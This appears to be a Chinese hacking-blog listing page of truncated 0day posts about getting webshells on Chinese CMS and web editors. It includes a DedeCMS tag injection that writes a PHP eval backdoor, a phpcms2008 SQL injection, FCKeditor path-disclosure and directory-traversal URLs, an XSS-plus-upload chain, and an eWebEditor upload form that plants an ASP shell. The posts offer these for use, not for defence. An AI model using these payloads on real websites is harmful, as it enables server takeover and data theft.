网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell
www.t00ls.net5 G$ w& h” m! n9 S: G
前题条件,必须准备好自己的dede数据库,然后插入数据:
insert into dede_mytag(aid,normbody) values(1,’{dede:php}$fp = @fopen(“1.php”, \’a\’);@fwrite($fp, \’<?php eval($_POST[c]) ?>\’);echo “OK”;@fclose($fp);{/dede:php}’);
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
) O+ I’ L2 I% Y) E: ...
0day, 漏洞阅读全文
这是一套破系统,拿人家源马改改就说是自己的,还收费
垃圾系统,还对源马进行了加密。
漏洞一大堆
后台登录验证文件:
<!–#include file=”conn.asp”–>
<!–#include file=”../class/Config.asp”–>
<!–#include file=”inc/md5.asp”–>
<!–#include file=”../class/Ubbsql.asp”–>
<%
dim sql,rs
dim username,password,CheckCode
username=replace(trim(request(“username”)),”‘”,”")
password=replace(trim(Request(...
0day, 漏洞阅读全文
受影响程序: phpcms2008 gbk
漏洞文件:ask/search_ajax.php
code:
<?php
require ‘./include/common.inc.php’;
require_once MOD_ROOT.’include/ask.class.php’;
$ask = new ask();
header(‘Content-type: text/html; charset=utf-8′);
if(strtolower(CHARSET) != ‘utf-8′) $q = iconv(CHARSET, ‘utf-8′, $q);
if($q)
{
$where = ” title LIKE ‘%$q%’ AND status = 5″;
}
else
{
exit(‘null’);
}
$infos = $...
漏洞阅读全文
漏洞类型:设计错误
漏洞描述:很多人认为XSS危害很小,在很多情况下还是很有危害的。比如这个cms,一个XSS+一个后台上传漏洞,单单这两个漏洞来说,都很鸡助,但是当两个鸡助的漏洞合体以后,威力将不可忽视。
详细说明:
1./anquan/UploadFiles_3093/201105/20110513202725238.jpg,右边操作栏->改名为XX.aspx,找到路径/files/xxx.aspx,直接得到webshell.漏洞明显设计逻辑有问题,不能直接上传aspx,但是可以间接的上传aspx.
ok,下面来说下这几个漏洞的危害,单单这几个漏洞来说,都很鸡助,但是结合起来,威...
漏洞阅读全文
1、查看编辑器版本
/fckeditor/editor/dialog/fck_about.html
2、爆绝对路径
FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php(支持php的通杀)
/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/aspx/connector.aspx 2.5可突破
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
3、遍历目录
/FCKeditor/editor/fil...
漏洞, 编辑器阅读全文
http://www.xxx.com/admin/ewebeditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp
这样会在 网站目录下生产 a.asp这个文件、
然后再本地构造html
<form action=”http://www.xxx.com/admin/ewebeditor/asp/upload.asp?action=savetype=image&style=popup&cusdir=a.asp” method=post name=myform enctype=”multipart/form-data”>
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form&...
shell, 利用, 漏洞阅读全文
最新评论
看看了 貌似很实用